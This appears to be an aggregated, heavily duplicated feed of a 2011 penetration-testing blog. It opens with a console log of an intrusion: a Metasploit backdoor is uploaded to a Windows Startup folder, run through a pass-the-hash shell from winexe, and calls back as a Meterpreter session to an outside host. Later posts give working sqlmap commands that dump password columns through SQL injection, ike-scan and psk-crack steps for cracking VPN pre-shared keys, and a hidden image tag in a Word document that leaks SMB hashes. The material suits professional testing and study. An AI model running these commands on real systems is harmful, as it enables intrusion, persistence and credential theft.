msf auxiliary(upload_file) > set RHOST 1.2.3.4
RHOST => 1.2.3.4
msf auxiliary(upload_file) > set LPATH /home/chris/msf3/msf_backdoor.exe
LPATH => /home/chris/msf3/msf_backdoor.exe
msf auxiliary(upload_file) > set RPATH "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\msf_backdoor.exe"
RPATH => C:\Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe
msf auxiliary(upload_file) > run
[*] Read 13616 bytes from /home/chris/msf3/msf_backdoor.exe...
[*] Connecting to the server...
[*] Mounting the remote share \\1.2.3.4\C$'...
[*] Trying to upload Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] The file has been uploaded to Documents and Settings\All Users\Start Menu\Programs\Startup\msf_backdoor.exe...
[*] Auxiliary module execution completed

################################################
#Set up a portforward to talk to hosts via SMB
################################################

meterpreter > portfwd add -l 445 -p 445 -r 1.2.3.4
[*] Local TCP relay created: 0.0.0.0:445 <-> 1.2.3.4:445

#####################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
#####################################################################

user@ubuntu:~/Desktop/winexe-hash$ export SMBHASH=aad3b435b51404eeaad3b435b51404ee:9eba97a1375911112222333398c61606
user@ubuntu:~/Desktop/winexe-hash$ ./winexe -U administrator //1.2.3.4 "cmd"
Password for [WORKGROUP\administrator]:
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . : inside.company.com
IP Address. . . . . . . . . . . . : 1.2.3.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 1.2.3.254

C:\WINDOWS\system32>
C:\Documents and Settings\All Users\Start Menu\Programs\Startup>dir
dir
Volume in drive C has no label.
Volume Serial Number is 0007-B088

Directory of C:\Documents and Settings\All Users\Start Menu\Programs\Startup

01/13/2012 03:55 PM .
01/13/2012 03:55 PM ..
01/13/2012 03:55 PM 13,616 msf_backdoor.exe
1 File(s) 13,616 bytes
2 Dir(s) 241,661,345,792 bytes free

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>msf_backdoor.exe
msf_backdoor.exe

C:\Documents and Settings\All Users\Start Menu\Programs\Startup>

[*] 5.5.5.5:4889 Request received for /INITM...
[*] 5.5.5.5:4889 Staging connection for target /INITM received...
[*] Patched transport at offset 486516...
[*] Patched URL at offset 486248...
[*] Patched Expiration Timeout at offset 641856...
[*] Patched Communication Timeout at offset 641860...
[*] Meterpreter session 5 opened (5.5.5.5:443 -> 6.6.6.6:4889) at Wed Jan 18 22:02:03 +0000 2012

Tags: nbsp upload file read target-address nbsp-nbsp-nbsp-nbsp-nbsp winexe

December 13, 2011
4:20
Not 0wning That ColdFusion Server but Helping...
» ‎ carnal0wnage.attackresearch.com

Stephen, @averagesecguy, wrote a post on owning a ColdFusion server. its pretty good and he wrote some code to help things along.

Code: https://github.com/averagesecurityguy/scripts

I thought I'd add to the conversation with some stuff I found doing CF research. The code he wrote and the metasploit module works great if things are in their default locations. Of course, this will never be the case when you are on a PT and need to break into that mofro.

Anyway, there is a misconfiguration that, when its present, can greatly help you exploit that locale traversal attack. Alot of time you can get the sha1.js and verify that the patch is not applied.

Anyway, more than once I've gotten that far but the host was Linux and locating the password.properties file failed. You're essentially guessing blind. So what i discovered is that sometimes the componentlist.cfm [Site/CFIDE/componentutils/componentlist.cfm] file is available. It looks like this:

Click on one of the components and you get full path to the installed component:

Not the best example, because stuff is where we would expect it to be. This one is better:

Now you know where to direct that directory traversal to get the proper file.

Other reading:
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Tags:

4:20
Not 0wning That ColdFusion Server but Helping...
» ‎ Carnal0wnage

Stephen, @averagesecguy, wrote a post on owning a ColdFusion server. its pretty good and he wrote some code to help things along.

Code: https://github.com/averagesecurityguy/scripts

I thought I'd add to the conversation with some stuff I found doing CF research. The code he wrote and the metasploit module works great if things are in their default locations. Of course, this will never be the case when you are on a PT and need to break into that mofro.

Anyway, there is a misconfiguration that, when its present, can greatly help you exploit that locale traversal attack. Alot of time you can get the sha1.js and verify that the patch is not applied.

Anyway, more than once I've gotten that far but the host was Linux and locating the password.properties file failed. You're essentially guessing blind. So what i discovered is that sometimes the componentlist.cfm [Site/CFIDE/componentutils/componentlist.cfm] file is available. It looks like this:

Click on one of the components and you get full path to the installed component:

Not the best example, because stuff is where we would expect it to be. This one is better:

Now you know where to direct that directory traversal to get the proper file.

Other reading:
http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/
Tags: server code coldfusion stephen cf-research password-properties default-locations

December 11, 2011
16:29
Root that Motorola Xoom and Get You Some BT5
» ‎ carnal0wnage.attackresearch.com

Rooting the Xoom and putting BT5 on it...

Check out

http://wiki.rootzwiki.com/Motorola_Xoom

For instructions to get android sdk (adb/fastboot) up and running. fastboot wasnt in the current sdk. i downloaded release 1.6.r1 from http://developer.android.com/sdk/older_releases.html and put that in my platform-tools directory.

Links for the root image and what not are busted there, so go to

http://www.xoomforums.com/forum/motorola-xoom-development/9621-root-universal-xoom-root-any-xoom-any-update.html

Follow instructions. make sure to copy the Xoom-Universal-Root.zip to EXTERNAL sdcard before you start :-)

I followed the instructions exactly as written and after reboot the Xoom was rooted.

For BT5:

go here http://www.backtrack-linux.org/downloads/, download BT5 for ARM.

unzip file, follow instructions in readme. It takes awhile to copy and extract things. I had two adb shells so i could watch the progress.

Similar instructions here: http://www.secmaniac.com/blog/2011/05/15/backtrack-5-on-motorola-xoom-in-10-minutes-or-less/

The result:
Of course, about 5 seconds of trying to type on it made me not think it was so cool. So if there is an easy way to make it suck less to send text the console let me know.
Tags:

16:29
Root that Motorola Xoom and Get You Some BT5
» ‎ Carnal0wnage

Rooting the Xoom and putting BT5 on it...

Check out

http://wiki.rootzwiki.com/Motorola_Xoom

For instructions to get android sdk (adb/fastboot) up and running. fastboot wasnt in the current sdk. i downloaded release 1.6.r1 from http://developer.android.com/sdk/older_releases.html and put that in my platform-tools directory.

Links for the root image and what not are busted there, so go to

http://www.xoomforums.com/forum/motorola-xoom-development/9621-root-universal-xoom-root-any-xoom-any-update.html

Follow instructions. make sure to copy the Xoom-Universal-Root.zip to EXTERNAL sdcard before you start :-)

I followed the instructions exactly as written and after reboot the Xoom was rooted.

For BT5:

go here http://www.backtrack-linux.org/downloads/, download BT5 for ARM.

unzip file, follow instructions in readme. It takes awhile to copy and extract things. I had two adb shells so i could watch the progress.

Similar instructions here: http://www.secmaniac.com/blog/2011/05/15/backtrack-5-on-motorola-xoom-in-10-minutes-or-less/

The result:
Of course, about 5 seconds of trying to type on it made me not think it was so cool. So if there is an easy way to make it suck less to send text the console let me know.
Tags: sdk root adb forum-motorola root-image sdcard motorola xoom

December 09, 2011

Permalink for 'SQLMap -- Searching Databases for Specific Columns/Data & Extracting from Specific Columns'

7:17

SQLMap -- Searching Databases for Specific Columns/Data & Extracting from Specific Columns

» ‎ carnal0wnage.attackresearch.com

So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

To search all databases for 'password'

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'

To search a specific database for 'password'

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'

**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**

[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'

You'll get asked:

do you want sqlmap to consider provided column(s):

[1] as LIKE column names (default)
[2] as exact column names
> 1

You'll want to give it a 1 first time around, it will probably give you stuff like this:

[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords

We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1

You could also just do a dump if you want to start grabbing data

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1

If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10

If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):

python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10

I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)

-CG

Tags:

7:17
SQLMap -- Searching Databases for Specific Columns/Data & Extracting from Specific Columns
» ‎ Carnal0wnage
So assuming we have some sort of SQL Injection in the application (Blind in this case) and we've previously dumped all the available databases (--dbs), we now want to search for columns with 'password' in them.

To search all databases for 'password'
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -C 'password'
```
To search a specific database for 'password'
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --time-sec=1 --search -D 'MYDATABASE' -C 'password'

**note, that once sqlmap was done with 'MYDATABASE' it checked the rest of the DBs**

[15:28:17] [INFO] fetching columns LIKE 'password' for table 'dbo.mytable' on database 'MYDATABASE'
```
You'll get asked:
```
do you want sqlmap to consider provided column(s):

[1] as LIKE column names (default)
[2] as exact column names
> 1
```
You'll want to give it a 1 first time around, it will probably give you stuff like this:
```
[15:27:38] [INFO] retrieved: 2
[15:28:22] [INFO] retrieved: Password
[15:29:18] [INFO] retrieved: PrintPasswords
```
We now know that we want to go back and enumerate/dump the column values from dbo.mytable and database MYDATABASE to see if there is anything good there. Mostly likely there is also a userID or LogonId in there we need to extract as well.
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --columns -T dbo.mytable -D MYDATABASE --time-sec=1
```
You could also just do a dump if you want to start grabbing data
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1
```
If you just want to pull a certain number of rows, you can also give a --start and --stop switch (--start=1 --stop=10) <--sometimes works, sometimes doesnt. Not sure whats up with that.
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
```
If you just want to just pull out certain columns you can do something like this (assuming columns LogonId and Password):
```
python sqlmap.py -u "http://192.168.1.1/mypath/mypoorlywrittenapp.asp?SessionID=" --dump -C LogonId,Password -T dbo.mytable -D MYDATABASE --time-sec=1 --start=1 --stop=10
```
I'm sure I just committed some SQLMap sins, so please correct me (like last time) :-)

-CG
Tags: password dbo sqlmap c-logonid d-mydatabase http-192-168-1-1 mydatabase mypath Pentesting

December 07, 2011
18:44
Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
» ‎ carnal0wnage.attackresearch.com
There hasnt been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:
```
$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)
```
To save with some output:
```
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
```
Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:
```
$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
```
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
```
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
```
To dictionary attack:
```
$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
```
You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.

Tags:

18:44
Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain
» ‎ Carnal0wnage
There hasnt been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:
```
$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)
```
To save with some output:
```
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
```
Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:
```
$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
```
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
```
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
```
To dictionary attack:
```
$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
```
You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.

Tags: psk mode hash cain there cisco-unity ike ike-main ike-aggressive brute-force-attack

November 28, 2011
21:46
Embeding A Link To A Network Share In A Word Doc
» ‎ carnal0wnage.attackresearch.com
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
```
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
 width=1 height=1][/body][html] 
```
Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

If this doesnt work for anyone let me know.

Tags:

21:46
Embeding A Link To A Network Share In A Word Doc
» ‎ Carnal0wnage
Someone asked me how to embed an HTML Link to an smb share into a word doc. End result would be to use the capture/server/smb or exploit/windows/exploit/smb/smb_relay modules. Easy right? Well it wasn't THAT easy...

In office 2010 when I'd go to pull in a picture to the document by adding a picture from a network share the picture would become part of the doc and not be retrieved every time the document opened. The solution was to add some html to the document.

I ended up addind the following code to the office document (replace "[" or "]" with "<" or ">":
```
[html][body][img src="\\192.168.26.133\share\pwn.jpeg"
 width=1 height=1][/body][html] 
```
Once that is done go to insert-->object--text from file-->select your HTML file

Once that is done, save and open the document, if all is well you'll see the SMB requests to the network share you specified and if you are running the smb capture module you should see some traffic. Screenshot below shows the goods...I do realize the LM hashes are missing from smb capture screenie (disabled on windows 7?) but i was too lazy to install office on a VM just for the screenshot.

If this doesnt work for anyone let me know.

Tags: share smb html capture-server smb-share office-document Pentesting

November 22, 2011
7:47
Oracle Web Hacking Part II
» ‎ carnal0wnage.attackresearch.com

Part II of the articles based on my Hacking Oracle Web Applications talk was posted on EthicalHacker.net today. Head over there to check it out.

Oracle Web Hacking Part II

Oracle Web Hacking Part I
Tags:

7:47
Oracle Web Hacking Part II
» ‎ Carnal0wnage

Part II of the articles based on my Hacking Oracle Web Applications talk was posted on EthicalHacker.net today. Head over there to check it out.

Oracle Web Hacking Part II

Oracle Web Hacking Part I
Tags: oracle hacking web oracle-web web-hacking web-application Pentesting

November 13, 2011
7:24
Weekly "That's Interesting" Wrap-Up 18 Nov 2011
» ‎ carnal0wnage.attackresearch.com

Break into other people's vuln scanners...or just waste your pentester's time...
https://github.com/kost/vulnscan-pwcrack

TrueCrypt guesser is pretty neat too
https://github.com/kost/tc-guesser

unlock with my face, or a picture of my face...no difference :-<
http://www.youtube.com/watch?v=BwfYSR7HttA

signing malware with legit certs...booyah
http://www.f-secure.com/weblog/archives/00002269.html

cracking Sirihttp://applidium.com/en/news/cracking_siri/

HBGary: The New Battlefield: Fighting and Defeating APT Attacks in the Enterprisehttp://www.hbgary.com/attachments/thenewbattlefield.pdf

*You can stop reading at the beginning of the sales pitch :-)

Tags:

7:24
Weekly "That's Interesting" Wrap-Up 18 Nov 2011
» ‎ Carnal0wnage

Break into other people's vuln scanners...or just waste your pentester's time...
https://github.com/kost/vulnscan-pwcrack

TrueCrypt guesser is pretty neat too
https://github.com/kost/tc-guesser

unlock with my face, or a picture of my face...no difference :-<
http://www.youtube.com/watch?v=BwfYSR7HttA

signing malware with legit certs...booyah
http://www.f-secure.com/weblog/archives/00002269.html

cracking Sirihttp://applidium.com/en/news/cracking_siri/

HBGary: The New Battlefield: Fighting and Defeating APT Attacks in the Enterprisehttp://www.hbgary.com/attachments/thenewbattlefield.pdf

*You can stop reading at the beginning of the sales pitch :-)

Tags: wrap Weekly face http-www-youtube sales-pitch siri wrap-up

November 11, 2011
18:30
Weekly "That's Interesting" Wrap-Up 11 Nov 2011
» ‎ carnal0wnage.attackresearch.com

Intersystems Cache Database

I know, had never heard of it either. But here are some commands so you can enum some version and other system type infoz:

http://docs.intersystems.com/cache20111/csp/docbook/DocBook.UI.Page.cls?KEY=RSQL_cosvariables

Hacking Satellites
http://www.dailymail.co.uk/news/article-2055311/Hackers-infiltrate-US-satellites-taken-complete-control-achieving-steps-required-command-satellite.html

Finally a decent APT article
http://krebsonsecurity.com/2011/10/chasing-apt-persistence-pays-off/

decent APT advice
http://blog.deepsec.net/?p=684

Joe McCray made an APT resource
http://advanced-persistent-threat.com/

More Duqu stuff http://www.securelist.com/en/blog/208193243/The_Duqu_Saga_Continues_Enter_Mr_B_Jason_and_TVs_Dexter
Tags:

18:30
Weekly "That's Interesting" Wrap-Up 11 Nov 2011
» ‎ Carnal0wnage

Intersystems Cache Database

I know, had never heard of it either. But here are some commands so you can enum some version and other system type infoz:

http://docs.intersystems.com/cache20111/csp/docbook/DocBook.UI.Page.cls?KEY=RSQL_cosvariables

Hacking Satellites
http://www.dailymail.co.uk/news/article-2055311/Hackers-infiltrate-US-satellites-taken-complete-control-achieving-steps-required-command-satellite.html

Finally a decent APT article
http://krebsonsecurity.com/2011/10/chasing-apt-persistence-pays-off/

decent APT advice
http://blog.deepsec.net/?p=684

Joe McCray made an APT resource
http://advanced-persistent-threat.com/

More Duqu stuff http://www.securelist.com/en/blog/208193243/The_Duqu_Saga_Continues_Enter_Mr_B_Jason_and_TVs_Dexter
Tags: wrap Weekly apt intersystems docbook complete-control wrap-up

November 01, 2011
13:22
nessuscmd for scanning a host with a subset of plugins
» ‎ carnal0wnage.attackresearch.com

Need to check a few specifc nessus plugins against a host?

$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107

Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Version : 12.0.0.6327
URL : http://192.168.1.92/

looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
Tags:

13:22
nessuscmd for scanning a host with a subset of plugins
» ‎ Carnal0wnage

Need to check a few specifc nessus plugins against a host?

$ sudo ./nessuscmd 192.168.1.92 -p80,443 -v -V -i 38157,10107

Starting nessuscmd 4.4.0
Scanning '192.168.1.92'...

Host 192.168.1.92 is up

Discovered open port http (80/tcp) on 192.168.1.92

[i] Plugin 10107 reported a result on port http (80/tcp) of 192.168.1.92
[i] Plugin 38157 reported a result on port http (80/tcp) of 192.168.1.92

+ Results found on 192.168.1.92
+ - Port http (80/tcp) is open
[i] Plugin ID 38157 Synopsis :
The remote web server contains a document sharing software Description : The remote web server is running SharePoint, a web interface for document management. As this interface is likely to contain sensitive information, make sure only authorized personel can log into this site See also : http://www.microsoft.com/Sharepoint/default.mspx

Solution : Make sure the proper access controls are put in place

Risk factor : None

Plugin output : The following instance of SharePoint was detected on the remote host :

Version : 12.0.0.6327
URL : http://192.168.1.92/

looks like the functionality has been there for awhile:
http://blog.tenablesecurity.com/2007/07/nessus-32-beta-.html
Tags: http host port software-description web-interface risk-factor Pentesting

October 15, 2011
7:08
Weekly "That's Interesting" Wrap-Up 21 Oct 2011
» ‎ carnal0wnage.attackresearch.com

TEDxRotterdam - Mikko Hypponen - safe internet will lead the future

http://youtu.be/WQgeUHlTThc

Similar to his other TED talk but worth the 20min. Its good up to "fixing things". Not sure I agree with his "fixes". I do agree with a more unified way to fight/arrest/ cyber criminals, but bottom line its still way too easy to break into stuff and still to easy to conduct Credit Card fraud. We need to adress some of that as well.

Also, I think plenty of people would disagree that anything Mac is "safe" because of market share.

OMG OMG OMG Stuxnet Part 2 or the parent of stuxnet or whatever
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Samples:
http://contagiodump.blogspot.com/2011/10/duqu-rat-trojan-precursor-to-next.html

Volatility Memory Forensics Federal Trojan aka R2D2

http://www.evild3ad.com/?p=1136

Tags:

7:08
Weekly "That's Interesting" Wrap-Up 21 Oct 2011
» ‎ Carnal0wnage

TEDxRotterdam - Mikko Hypponen - safe internet will lead the future

http://youtu.be/WQgeUHlTThc

Similar to his other TED talk but worth the 20min. Its good up to "fixing things". Not sure I agree with his "fixes". I do agree with a more unified way to fight/arrest/ cyber criminals, but bottom line its still way too easy to break into stuff and still to easy to conduct Credit Card fraud. We need to adress some of that as well.

Also, I think plenty of people would disagree that anything Mac is "safe" because of market share.

OMG OMG OMG Stuxnet Part 2 or the parent of stuxnet or whatever
http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/w32_duqu_the_precursor_to_the_next_stuxnet.pdf

Samples:
http://contagiodump.blogspot.com/2011/10/duqu-rat-trojan-precursor-to-next.html

Volatility Memory Forensics Federal Trojan aka R2D2

http://www.evild3ad.com/?p=1136

Tags: omg way stuxnet ted mac credit-card-fraud cyber-criminals enterprise-media wrap-up

October 07, 2011
12:01
Weekly "That's Interesting" Wrap-Up 14 Oct 2011
» ‎ carnal0wnage.attackresearch.com

Bios Rootkits (mebromi)
http://blog.webroot.com/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/

Apache reverse proxy (mod-rewrite) bypass vuln details
http://www.contextis.com/research/blog/reverseproxybypass/

CCC Analyzes government malware (In German, go go gadget google translate)
http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf

http://m.zdnet.com/blog/hardware/can-you-trust-your-antivirus-solution-to-protect-you-against-governmental-backdoors-and-lawful-interception-police-trojans/15280

Tips for evading AV during Pentests
http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing

Check out the conversation between Dave Kennedy and Rafal Los on CSOs, popping shells, #secBiz from 13 Oct
https://twitter.com/#!/dave_rel1k
https://twitter.com/#!/Wh1t3Rabbit

Lastly, from the "no more free bugs" and "hey companies, this is NOT how you behave to people that report vulns" categories

"Security researcher threatened with vulnerability repair bill"
http://www.scmagazine.com.au/News/276780,security-researcher-threatened-with-vulnerability-repair-bill.aspx
Tags:

12:01
Weekly "That's Interesting" Wrap-Up 14 Oct 2011
» ‎ Carnal0wnage

Bios Rootkits (mebromi)
http://blog.webroot.com/2011/09/13/mebromi-the-first-bios-rootkit-in-the-wild/

Apache reverse proxy (mod-rewrite) bypass vuln details
http://www.contextis.com/research/blog/reverseproxybypass/

CCC Analyzes government malware (In German, go go gadget google translate)
http://www.ccc.de/system/uploads/76/original/staatstrojaner-report23.pdf

http://m.zdnet.com/blog/hardware/can-you-trust-your-antivirus-solution-to-protect-you-against-governmental-backdoors-and-lawful-interception-police-trojans/15280

Tips for evading AV during Pentests
http://pen-testing.sans.org/blog/2011/10/13/tips-for-evading-anti-virus-during-pen-testing

Check out the conversation between Dave Kennedy and Rafal Los on CSOs, popping shells, #secBiz from 13 Oct
https://twitter.com/#!/dave_rel1k
https://twitter.com/#!/Wh1t3Rabbit

Lastly, from the "no more free bugs" and "hey companies, this is NOT how you behave to people that report vulns" categories

"Security researcher threatened with vulnerability repair bill"
http://www.scmagazine.com.au/News/276780,security-researcher-threatened-with-vulnerability-repair-bill.aspx
Tags: wrap Weekly oct rafal-los dave-kennedy google scmagazine wrap-up

October 06, 2011
19:10
Weekly "That's Interesting" Wrap-Up 7 Oct 2011
» ‎ carnal0wnage.attackresearch.com

i'm probably gonna fail miserably at regularly posting anything but F it, im motivated right now and that's what matters.

